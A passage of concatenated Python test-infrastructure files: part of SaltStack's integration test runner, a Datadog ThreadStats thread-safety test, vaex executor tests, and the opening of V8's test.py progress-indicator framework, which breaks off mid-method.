(master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts): if 'engines' not in conf: conf['engines'] = [] conf['engines'].append({'salt_runtests': {}}) if 'engines_dirs' not in conf: conf['engines_dirs'] = [] conf['engines_dirs'].insert(0, ENGINES_DIR) if 'log_handlers_dirs' not in conf: conf['log_handlers_dirs'] = [] conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR) conf['runtests_log_port'] = SALT_LOG_PORT # ----- Transcribe Configuration ----------------------------------------------------------------------------> for entry in os.listdir(RUNTIME_VARS.CONF_DIR): if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'): # These have runtime computed values and will be handled # differently continue entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry) if os.path.isfile(entry_path): shutil.copy( entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry) ) elif os.path.isdir(entry_path): shutil.copytree( entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry) ) for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master'): computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)]) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_: fp_.write(yaml.dump(computed_config, default_flow_style=False)) sub_minion_computed_config = copy.deepcopy(sub_minion_opts) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh: wfh.write( yaml.dump(sub_minion_computed_config, default_flow_style=False) ) shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master')) syndic_master_computed_config = copy.deepcopy(syndic_master_opts) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh: wfh.write( yaml.dump(syndic_master_computed_config, default_flow_style=False) ) syndic_computed_config = copy.deepcopy(syndic_opts) with salt.utils.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh: wfh.write( yaml.dump(syndic_computed_config, default_flow_style=False) ) shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master')) # <---- Transcribe Configuration ----------------------------------------------------------------------------- # ----- Verify Environment ----------------------------------------------------------------------------------> master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master')) minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion')) syndic_opts = salt.config.syndic_config( os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), ) sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion')) syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master')) RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts) RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts) RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts) RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts) RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts) verify_env([os.path.join(master_opts['pki_dir'], 'minions'), os.path.join(master_opts['pki_dir'], 'minions_pre'), os.path.join(master_opts['pki_dir'], 'minions_rejected'), os.path.join(master_opts['pki_dir'], 'minions_denied'), os.path.join(master_opts['cachedir'], 'jobs'), os.path.join(master_opts['cachedir'], 'raet'), os.path.join(master_opts['root_dir'], 'cache', 'tokens'), os.path.join(syndic_master_opts['pki_dir'], 'minions'), os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'), os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'), os.path.join(syndic_master_opts['cachedir'], 'jobs'), os.path.join(syndic_master_opts['cachedir'], 'raet'), os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'), os.path.join(master_opts['pki_dir'], 'accepted'), os.path.join(master_opts['pki_dir'], 'rejected'), os.path.join(master_opts['pki_dir'], 'pending'), os.path.join(syndic_master_opts['pki_dir'], 'accepted'), os.path.join(syndic_master_opts['pki_dir'], 'rejected'), os.path.join(syndic_master_opts['pki_dir'], 'pending'), os.path.join(syndic_master_opts['cachedir'], 'raet'), os.path.join(minion_opts['pki_dir'], 'accepted'), os.path.join(minion_opts['pki_dir'], 'rejected'), os.path.join(minion_opts['pki_dir'], 'pending'), os.path.join(minion_opts['cachedir'], 'raet'), os.path.join(sub_minion_opts['pki_dir'], 'accepted'), os.path.join(sub_minion_opts['pki_dir'], 'rejected'), os.path.join(sub_minion_opts['pki_dir'], 'pending'), os.path.join(sub_minion_opts['cachedir'], 'raet'), os.path.dirname(master_opts['log_file']), minion_opts['extension_modules'], sub_minion_opts['extension_modules'], sub_minion_opts['pki_dir'], master_opts['sock_dir'], syndic_master_opts['sock_dir'], sub_minion_opts['sock_dir'], minion_opts['sock_dir'], RUNTIME_VARS.TMP_STATE_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE, TMP, ], RUNTIME_VARS.RUNNING_TESTS_USER) cls.master_opts = master_opts cls.minion_opts = minion_opts cls.sub_minion_opts = sub_minion_opts cls.syndic_opts = syndic_opts cls.syndic_master_opts = syndic_master_opts # <---- Verify Environment ----------------------------------------------------------------------------------- def __exit__(self, type, value, traceback): ''' Kill the minion and master processes ''' self.sub_minion_process.terminate() self.minion_process.terminate() self.master_process.terminate() try: self.syndic_process.terminate() except AttributeError: pass try: self.smaster_process.terminate() except AttributeError: pass #salt.utils.process.clean_proc(self.sub_minion_process, wait_for_kill=50) #self.sub_minion_process.join() #salt.utils.process.clean_proc(self.minion_process, wait_for_kill=50) #self.minion_process.join() #salt.utils.process.clean_proc(self.master_process, wait_for_kill=50) #self.master_process.join() #try: # salt.utils.process.clean_proc(self.syndic_process, wait_for_kill=50) # self.syndic_process.join() #except AttributeError: # pass #try: # salt.utils.process.clean_proc(self.smaster_process, wait_for_kill=50) # self.smaster_process.join() #except AttributeError: # pass self.log_server.server_close() self.log_server.shutdown() self._exit_mockbin() self._exit_ssh() self.log_server_process.join() # Shutdown the multiprocessing logging queue listener salt_log_setup.shutdown_multiprocessing_logging() salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True) def pre_setup_minions(self): ''' Subclass this method for additional minion setups. ''' def setup_minions(self): ''' Minions setup routines ''' def post_setup_minions(self): ''' Subclass this method to execute code after the minions have been setup ''' def _enter_mockbin(self): path = os.environ.get('PATH', '') path_items = path.split(os.pathsep) if MOCKBIN not in path_items: path_items.insert(0, MOCKBIN) os.environ['PATH'] = os.pathsep.join(path_items) def _exit_ssh(self): if hasattr(self, 'sshd_process'): try: self.sshd_process.kill() except OSError as exc: if exc.errno != 3: raise with salt.utils.fopen(self.sshd_pidfile) as fhr: try: os.kill(int(fhr.read()), signal.SIGKILL) except OSError as exc: if exc.errno != 3: raise def _exit_mockbin(self): path = os.environ.get('PATH', '') path_items = path.split(os.pathsep) try: path_items.remove(MOCKBIN) except ValueError: pass os.environ['PATH'] = os.pathsep.join(path_items) @classmethod def clean(cls): ''' Clean out the tmp files ''' def remove_readonly(func, path, excinfo): # Give full permissions to owner os.chmod(path, stat.S_IRWXU) func(path) for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE): if os.path.isdir(dirname): shutil.rmtree(dirname, onerror=remove_readonly) def wait_for_jid(self, targets, jid, timeout=120): time.sleep(1) # Allow some time for minions to accept jobs now = datetime.now() expire = now + timedelta(seconds=timeout) job_finished = False while now <= expire: running = self.__client_job_running(targets, jid) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) if not running and job_finished is False: # Let's not have false positives and wait one more seconds job_finished = True elif not running and job_finished is True: return True elif running and job_finished is True: job_finished = False if job_finished is False: sys.stdout.write( ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format( '{0}'.format(expire - now).rsplit('.', 1)[0], ', '.join(running), **self.colors ) ) sys.stdout.flush() time.sleep(1) now = datetime.now() else: # pylint: disable=W0120 sys.stdout.write( '\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information ' 'back\n'.format(**self.colors) ) sys.stdout.flush() return False def __client_job_running(self, targets, jid): running = self.client.cmd( list(targets), 'saltutil.running', tgt_type='list' ) return [ k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid ] def wait_for_minion_connections(self, targets, timeout): salt.utils.appendproctitle('WaitForMinionConnections') sys.stdout.write( ' {LIGHT_BLUE}*{ENDC} Waiting at most {0} for minions({1}) to ' 'connect back\n'.format( (timeout > 60 and timedelta(seconds=timeout) or '{0} secs'.format(timeout)), ', '.join(targets), **self.colors ) ) sys.stdout.flush() expected_connections = set(targets) now = datetime.now() expire = now + timedelta(seconds=timeout) while now <= expire: sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format( '{0}'.format(expire - now).rsplit('.', 1)[0], ', '.join(expected_connections), **self.colors ) ) sys.stdout.flush() try: responses = self.client.cmd( list(expected_connections), 'test.ping', tgt_type='list', ) # we'll get this exception if the master process hasn't finished starting yet except SaltClientError: time.sleep(0.1) now = datetime.now() continue for target in responses: if target not in expected_connections: # Someone(minion) else "listening"? continue expected_connections.remove(target) sys.stdout.write( '\r{0}\r'.format( ' ' * getattr(self.parser.options, 'output_columns', PNUM) ) ) sys.stdout.write( ' {LIGHT_GREEN}*{ENDC} {0} connected.\n'.format( target, **self.colors ) ) sys.stdout.flush() if not expected_connections: return time.sleep(1) now = datetime.now() else: # pylint: disable=W0120 print( '\n {LIGHT_RED}*{ENDC} WARNING: Minions failed to connect ' 'back. Tests requiring them WILL fail'.format(**self.colors) ) try: print_header( '=', sep='=', inline=True, width=getattr(self.parser.options, 'output_columns', PNUM) ) except TypeError: print_header('=', sep='=', inline=True) raise SystemExit() def sync_minion_modules_(self, modules_kind, targets, timeout=None): if not timeout: timeout = 120 # Let's sync all connected minions print( ' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} ' '(saltutil.sync_{1})'.format( ', '.join(targets), modules_kind, **self.colors ) ) syncing = set(targets) jid_info = self.client.run_job( list(targets), 'saltutil.sync_{0}'.format(modules_kind), tgt_type='list', timeout=999999999999999, ) if self.wait_for_jid(targets, jid_info['jid'], timeout) is False: print( ' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. ' 'Tests requiring these {0} WILL fail'.format( modules_kind, **self.colors) ) raise SystemExit() while syncing: rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1) if rdata: for name, output in six.iteritems(rdata): if not output['ret']: # Already synced!? syncing.remove(name) continue if isinstance(output['ret'], six.string_types): # An errors has occurred print( ' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: ' '{1}'.format( name, output['ret'], modules_kind, **self.colors) ) return False print( ' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: ' '{1}'.format( name, ', '.join(output['ret']), modules_kind, **self.colors ) ) # Synced! try: syncing.remove(name) except KeyError: print( ' {LIGHT_RED}*{ENDC} {0} already synced??? ' '{1}'.format(name, output, **self.colors) ) return True def sync_minion_states(self, targets, timeout=None): salt.utils.appendproctitle('SyncMinionStates') self.sync_minion_modules_('states', targets, timeout=timeout) def sync_minion_modules(self, targets, timeout=None): salt.utils.appendproctitle('SyncMinionModules') self.sync_minion_modules_('modules', targets, timeout=timeout) def sync_minion_grains(self, targets, timeout=None): salt.utils.appendproctitle('SyncMinionGrains') self.sync_minion_modules_('grains', targets, timeout=timeout)
test_threadstats_thread_safety.py
import re import time import threading from nose import tools as t from datadog import ThreadStats class MemoryReporter(object): """ A reporting class that reports to memory for testing. """ def __init__(self): self.metrics = [] self.events = [] def flush_metrics(self, metrics): self.metrics += metrics def flush_events(self, events): self.events += events class ThreadStatsTest(ThreadStats): def send_metrics_and_event(self, id): # Counter self.increment("counter", timestamp=12345) time.sleep(0.001) # sleep makes the os continue another thread # Gauge self.gauge("gauge_" + str(id), 42) time.sleep(0.001) # sleep makes the os continue another thread # Histogram self.histogram("histogram", id, timestamp=12345) time.sleep(0.001) # sleep makes the os continue another thread # Event self.event("title", "content") class TestThreadStatsThreadSafety(object): def test_threadstats_thread_safety(self): stats = ThreadStatsTest() stats.start(roll_up_interval=10, flush_in_thread=False) reporter = stats.reporter = MemoryReporter() for i in range(10000): threading.Thread(target=stats.send_metrics_and_event, args=[i]).start() # Wait all threads to finish time.sleep(10) # Flush and check stats.flush() metrics = reporter.metrics events = reporter.events # Overview t.assert_equal(len(metrics), 10009, len(metrics)) # Sort metrics counter_metrics = [] gauge_metrics = [] histogram_metrics = [] for m in metrics: if re.match("gauge_.*", m['metric']): gauge_metrics.append(m) elif re.match("histogram.*", m['metric']): histogram_metrics.append(m) else: counter_metrics.append(m) # Counter t.assert_equal(len(counter_metrics), 1, len(counter_metrics)) counter = counter_metrics[0] t.assert_equal(counter['points'][0][1], 10000, counter['points'][0][1]) # Gauge t.assert_equal(len(gauge_metrics), 10000, len(gauge_metrics)) # Histogram t.assert_equal(len(histogram_metrics), 8, len(histogram_metrics)) count_histogram = filter(lambda x: x['metric'] == "histogram.count", histogram_metrics)[0] t.assert_equal(count_histogram['points'][0][1], 10000, count_histogram['points'][0][1]) sum_histogram = filter(lambda x: x['metric'] == "histogram.avg", histogram_metrics)[0] t.assert_equal(sum_histogram['points'][0][1], 4999.5, sum_histogram['points'][0][1]) # Events t.assert_equal(10000, len(events), len(events))
execution_test.py
from unittest.mock import MagicMock from concurrent.futures import ThreadPoolExecutor import concurrent.futures import platform import threading import pytest import numpy as np from common import small_buffer import vaex def test_evaluate_expression_once(): calls = 0 def add(a, b): nonlocal calls if len(a) > 1: # skip dtype calls calls += 1 return a + b x = np.arange(5) y = x**2 df = vaex.from_arrays(x=x, y=y) df.add_function('add', add) df['z'] = df.func.add(df.x, df.y) df.executor.passes = 0 df.z.sum(delay=True) df._set('z', delay=True) calls = 0 df.execute() assert df.executor.passes == 1 assert calls == 1 def test_nested_use_of_executor(): df = vaex.from_scalars(x=1, y=2) @vaex.delayed def next(x): # although the exector is still in its look, it's not using the threads anymore # so we should be able to use the executor again return x + df.y.sum() value = next(df.x.sum(delay=True)) df.execute() assert value.get() == 1 + 2 def test_passes_two_datasets(): df1 = vaex.from_scalars(x=1, y=2) df2 = vaex.from_scalars(x=1, y=3) executor = df1.executor executor.passes = 0 df1.sum('x') assert executor.passes == 1 df1.sum('x', delay=True) df2.sum('x', delay=True) df1.execute() assert executor.passes == 3 def test_passes_two_datasets_different_vars(): x = np.array([2.]) y = x**2 dataset = vaex.dataset.DatasetArrays(x=x, y=y) df1 = vaex.from_dataset(dataset) df2 = vaex.from_dataset(dataset) df1.variables['a'] = 1 df2.variables['a'] = 2 df1['z'] = 'x + y * a' df2['z'] = 'x + y * a' executor = df1.executor executor.passes = 0 s1 = df1.sum('z', delay=True) s2 = df2.sum('z', delay=True) df1.execute() assert executor.passes == 1 assert s1.get() == 2 + 4 * 1 assert s2.get() == 2 + 4 * 2 def test_passes_two_datasets_different_expressions(): x = np.array([2.]) y = x**2 dataset = vaex.dataset.DatasetArrays(x=x, y=y) df1 = vaex.from_dataset(dataset) df2 = vaex.from_dataset(dataset) df1['a'] = 'x * y' df2['b'] = 'x + y' executor = df1.executor executor.passes = 0 s1 = df1.sum('a', delay=True) s2 = df2.sum('b', delay=True) df1.execute() assert executor.passes == 1 assert s1.get() == 2 * 4 assert s2.get() == 2 + 4 def test_passes_filtering(): x = np.arange(10) df = vaex.from_arrays(x=x, y=x**2) df1 = df[df.x < 4] df2 = df[df.x > 7] executor = df.executor executor.passes = 0 result1 = df1.sum('x', delay=True) result2 = df2.sum('x', delay=True) df.execute() assert executor.passes == 1 assert result1.get() == 1 + 2 + 3 assert result2.get() == 8 + 9 def test_multiple_tasks_different_columns_names(): df1 = vaex.from_scalars(x=1, y=2) df2 = vaex.from_scalars(x=1, y=2) x = df1.sum('x', delay=True) y = df2.sum('y', delay=True) df1.execute() assert x.get() == 1 assert y.get() == 2 def test_merge_aggregation_tasks(): df = vaex.from_arrays(x=[1, 2], y=[2, 3]) binners = df._create_binners('x', [0.5, 2.5], 2) binners2 = df._create_binners('x', [0.5, 2.5], 2) assert len(binners) == 1 vaex.agg.count().add_tasks(df, binners) assert len(df.executor.tasks) == 1 assert binners is not binners2 assert binners[0] is not binners2[0] assert binners == binners2 assert binners[0] == binners2[0] vaex.agg.sum('y').add_tasks(df, binners) assert len(df.executor.tasks) == 2 tasks = df.executor._pop_tasks() assert len(tasks) == 2 tasks = vaex.execution._merge_tasks_for_df(tasks, df) assert len(tasks) == 1 assert isinstance(tasks[0], vaex.tasks.TaskAggregations) def test_merge_same_aggregation_tasks(): df = vaex.from_arrays(x=[1, 2], y=[2, 3]) binners = df._create_binners('x', [0.5, 2.5], 2) binners2 = df._create_binners('x', [0.5, 2.5], 2) assert len(binners) == 1 # these two aggregations should be merged into 1 subtask [task1], result1 = vaex.agg.count().add_tasks(df, binners) [task2], result2 = vaex.agg.count().add_tasks(df, binners) assert len(df.executor.tasks) == 1 df.execute() assert task1 is task2 assert np.all(result1.get() == result2.get()) def test_signals(df): x = np.arange(10) y = x**2 sum_x_expected = x.sum() sum_y_expected = y.sum() with vaex.cache.off(): mock_begin = MagicMock() mock_progress = MagicMock() mock_end = MagicMock() len(df) # ensure we have the filter precomputed df.executor.signal_begin.connect(mock_begin) df.executor.signal_progress.connect(mock_progress) df.executor.signal_end.connect(mock_end) sum_x = df.sum(df.x, delay=True) sum_y = df.sum(df.y, delay=True) df.execute() assert sum_x.get() == sum_x_expected assert sum_y.get() == sum_y_expected mock_begin.assert_called_once() mock_progress.assert_called_with(1.0) mock_end.assert_called_once() def test_reentrant_catch(df_local): with vaex.cache.off(): df = df_local # a 'worker' thread should not be allowed to trigger a new computation def progress(fraction): print('progress', fraction) df.count(df.x) # enters the executor again with pytest.raises(RuntimeError) as exc: df.count(df.x, progress=progress) assert 'nested' in str(exc.value) @pytest.mark.skipif(platform.system().lower() == 'windows', reason="hangs appveyor very often, bug?") def test_thread_safe(df_local): with vaex.cache.off(): df = df_local # but an executor should be thread save def do(): return df_local.count(df.x) # enters the executor from a thread count = df_local.count(df.x) tpe = ThreadPoolExecutor(4) futures = [] passes = df.executor.passes N = 100 with small_buffer(df): for i in range(N): futures.append(tpe.submit(do)) done, not_done = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_EXCEPTION) for future in done: assert count == future.result() assert df.executor.passes <= passes + N def test_delayed(df): with vaex.cache.off(): @vaex.delayed def add(a, b): return a + b total_promise = add(df.sum(df.x, delay=True), 1) df.execute() assert total_promise.get() == df.sum(df.x) + 1 def test_nested_task(df): with vaex.cache.off(): @vaex.delayed def add(a, b): return a + b total_promise = add(df.sum(df.x, delay=True)) @vaex.delayed def next(value): # during the handling of the sum task, we add a new task sumy_promise = df.sum(df.y, delay=True) if df.is_local(): assert not df.executor.local.executing # without callling the exector, since it should still be running its main loop return add(sumy_promise, value) total_promise = next(df.sum(df.x, delay=True)) df.execute() assert total_promise.get() == df.sum(df.x) + df.sum(df.y) def test_executor_from_other_thread(): with vaex.cache.off(): df = vaex.from_arrays(x=[1, 2]) def execute(): # but call execute from a different thread df.execute() # we add a tasks from the main thread, we use binby without limits to force # a double computation. c = df.count('x', binby='x', delay=True, edges=True) thread = threading.Thread(target=execute) thread.start() thread.join() assert sum(c.get()) == 2 # def test_add_and_cancel_tasks(df_executor): # df = df_executor # def add_task_and_cancel(fraction): # df.sum(df.x, delay=True) # return False # future = df.count(progress=add_task_and_cancel, delay=True) # df.execute() # with pytest.raises(vaex.execution.UserAbort): # future.get() # assert df.executor.tasks # import vaex # import vaex.dask # import vaex.ray # import numpy as np # @pytest.fixture(params=['executor_dask', 'executor_ray']) # def executor(request, executor_dask, executor_ray): # named = dict(executor_dask=executor_dask, executor_ray=executor_ray) # return named[request.param] # @pytest.fixture(scope='session') # def executor_ray(): # return vaex.ray.Executor(chunk_size=2) # @pytest.fixture(scope='session') # def executor_dask(): # return vaex.dask.Executor(chunk_size=2) # @pytest.fixture # def df(): # x = np.arange(10) # y = x**2 # df = vaex.from_arrays(x=x, y=y) # return df # def test_task_sum(df, executor): # total = df.x.sum() # task = vaex.tasks.TaskSum(df, 'x') # # df.executor = None # # df._expressions = None # # executor = vaex.ray.ExecutorRay() # executor.schedule(task) # executor.execute() # assert task.result == total # def test_sum(df, executor): # total = df.x.sum() # df.executor = executor # total2 = df.x.sum() # assert total == total2
test.py
#!/usr/bin/env python # # Copyright 2012 the V8 project authors. All rights reserved. # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following # disclaimer in the documentation and/or other materials provided # with the distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import imp import optparse import os from os.path import join, dirname, abspath, basename, isdir, exists import platform import re import signal import subprocess import sys import tempfile import time import threading import utils from Queue import Queue, Empty VERBOSE = False # --------------------------------------------- # --- P r o g r e s s I n d i c a t o r s --- # --------------------------------------------- class ProgressIndicator(object): def __init__(self, cases): self.cases = cases self.queue = Queue(len(cases)) for case in cases: self.queue.put_nowait(case) self.succeeded = 0 self.remaining = len(cases) self.total = len(cases) self.failed = [ ] self.crashed = 0 self.terminate = False self.lock = threading.Lock() def PrintFailureHeader(self, test): if test.IsNegative(): negative_marker = '[negative] ' else: negative_marker = '' print "=== %(label)s %(negative)s===" % { 'label': test.GetLabel(), 'negative': negative_marker } print "Path: %s" % "/".join(test.path) def Run(self, tasks): self.Starting() threads = [] # Spawn N-1 threads and then use this thread as the last one. # That way -j1 avoids threading altogether which is a nice fallback # in case of threading problems. for i in xrange(tasks - 1): thread = threading.Thread(target=self.RunSingle, args=[]) threads.append(thread) thread.start() try: self.RunSingle() # Wait for the remaining threads for thread in threads: # Use a timeout so that signals (ctrl-c) will be processed. thread.join(timeout=10000000) except Exception, e: # If there's an exception we schedule an interruption for any # remaining threads. self.terminate = True # ...and then reraise the exception to bail out raise self.Done() return not self.failed def RunSingle(self): while not self.terminate: try: test = self.queue.get_nowait() except Empty: return case = test.case self.lock.acquire() self.AboutToRun(case) self.lock.release() try: start = time.time() output = case.Run() case.duration = (time.time() - start) except BreakNowException: self.terminate = True except IOError, e: assert self.terminate return if self.terminate: return self.lock.acquire() if output.UnexpectedOutput(): self.failed.append(output) if output.HasCrashed(): self.crashed += 1 else: self.succeeded += 1 self.remaining -= 1 self.HasRun(output) self.lock.release() def EscapeCommand(command): parts = [] for part in command: if ' ' in part: # Escape spaces. We may need to escape more characters for this # to work properly. parts.append('"%s"' % part) else: parts.append(part) return " ".join(parts) class SimpleProgressIndicator(ProgressIndicator): def Starting(self): print 'Running %i tests' % len(self.cases) def Done(self): print for failed in self.failed: self.PrintFailureHeader(failed.test) if failed.output.stderr: print "--- stderr ---" print failed.output.stderr.strip() if failed.output.stdout: print "--- stdout ---" print failed.output.stdout.strip() print "Command: %s" % EscapeCommand(failed.command) if failed.HasCrashed(): print "--- CRASHED ---" if failed.HasTimedOut(): print "--- TIMEOUT ---" if len(self.failed) == 0: print "===" print "=== All tests succeeded" print "===" else: print print "===" print "=== %i tests failed" % len(self.failed) if self.crashed > 0: print "=== %i tests CRASHED" % self.crashed print "===" class VerboseProgressIndicator(SimpleProgressIndicator): def AboutToRun(self, case): print 'Starting %s...' % case.GetLabel() sys.stdout.flush() def HasRun(self, output): if output.UnexpectedOutput(): if output.HasCrashed(): outcome = 'CRASH' else: outcome = 'FAIL' else: outcome = 'pass' print 'Done running %s: %s' % (output.test.GetLabel(), outcome) class DotsProgressIndicator(SimpleProgressIndicator): def AboutToRun(self, case): pass def HasRun(self, output): total = self.succeeded + len(self.failed) if (total > 1) and (total % 50 == 1): sys.stdout.write('\n') if output.UnexpectedOutput(): if output.HasCrashed(): sys.stdout.write('C') sys.stdout.flush() elif output.HasTimedOut(): sys.stdout.write('T') sys.stdout.flush() else: sys.stdout.write('F') sys.stdout.flush() else: sys.stdout.write('.') sys.stdout.flush() class CompactProgressIndicator(ProgressIndicator): def __init__(self, cases, templates): super(CompactProgressIndicator, self).__init__(cases) self.templates = templates self.last_status_length = 0 self.start_time = time.time() def Starting(self): pass def Done(self): self.PrintProgress('Done') def AboutToRun(self, case): self.PrintProgress(case.GetLabel()) def HasRun(self, output): if output.UnexpectedOutput(): self.ClearLine(self.last_status_length) self.PrintFailureHeader(output.test) stdout = output.output.stdout.strip() if len(stdout): print self.templates['stdout'] % stdout stderr = output.output.stderr.strip() if len(stderr): print self.templates['stderr'] % stderr print "Command: %s" % EscapeCommand(output.command) if output.HasCrashed(): print "--- CRASHED ---" if output.HasTimedOut(): print "--- TIMEOUT ---" def Truncate(self, str, length): if length and (len(str) > (length - 3)): return str[:(length-3)] + "..." else: return str def PrintProgress(self, name): self.ClearLine(self.last_status_length) elapsed = time.time() - self.start_time status = self.templates['status_line'] % { 'passed': self.succeeded, 'remaining': (((self.total - self.remaining) * 100) // self.total), 'failed': len(self.failed), 'test': name, 'mins': int(elapsed) / 60, 'secs': int(elapsed) % 60 } status = self.Truncate(status, 78) self.last_status_length = len(status) print status, sys.stdout.flush() class ColorProgressIndicator(CompactProgressIndicator): def __init__(self, cases): templates = { 'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s", 'stdout': "\033[1m%s\033[0m", 'stderr': "\033[31m%s\033[0m", } super(ColorProgressIndicator, self).__init__(cases, templates) def ClearLine(self, last_line_length): print "\033[1K\r", class MonochromeProgressIndicator(CompactProgressIndicator): def __init__(self, cases): templates = { 'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s", 'stdout': '%s', 'stderr': '%s', 'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"), 'max_length': 78 } super(MonochromeProgressIndicator, self).__init__(cases, templates) def ClearLine(self, last_line_length): print ("\r" + (" " * last_line_length) + "\r"), PROGRESS_INDICATORS = { 'verbose': VerboseProgressIndicator, 'dots': DotsProgressIndicator, 'color': ColorProgressIndicator, 'mono': MonochromeProgressIndicator } # ------------------------- # --- F r a m e w o r k --- # ------------------------- class BreakNowException(Exception): def __init__(self, value): self.value = value def __str__(self): return repr(self.value) class CommandOutput(object): def __init__(self, exit_code, timed_out, stdout, stderr): self.exit_code = exit_code self.timed_out = timed_out self.stdout = stdout self.stderr = stderr self.failed = None class TestCase(object): def __init__(self, context, path, mode): self.path = path self.context = context self.duration = None self.mode = mode def IsNegative(self): return False def TestsIsolates(self): return False def CompareTime(self, other): return cmp(other.duration, self.duration) def DidFail(self, output): if output.failed is None: output.failed = self.IsFailureOutput(output) return output.failed def IsFailureOutput(self, output): return output.exit_code != 0 def GetSource(self): return "(no source available)" def RunCommand(self, command): full_command = self.context.processor(command) output = Execute(full_command, self.context, self.context.GetTimeout(self, self.mode)) self.Cleanup() return TestOutput(self, full_command, output, self.context.store_unexpected_output) def BeforeRun(self): pass def AfterRun(self, result): pass def GetCustomFlags(self, mode): return None def Run(self): self.BeforeRun() result = None try: result = self.RunCommand(self.GetCommand()) except: self.terminate = True raise BreakNowException("User pressed CTRL+C or IO went wrong") finally: self.AfterRun(result) return result def Cleanup(self): return class TestOutput(object): def __init__(self, test, command, output, store_unexpected_output): self.test = test self.command = command self.output = output self.store_unexpected_output = store_unexpected_output def UnexpectedOutput(self): if self.HasCrashed(): outcome = CRASH elif self.HasTimedOut(): outcome = TIMEOUT elif self.HasFailed(): outcome = FAIL else: outcome = PASS return not outcome in self.test.outcomes def HasPreciousOutput(self): return self.UnexpectedOutput() and self.store_unexpected_output def HasCrashed(self): if utils.IsWindows(): return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code) else: # Timed out tests will have exit_code -signal.SIGTERM. 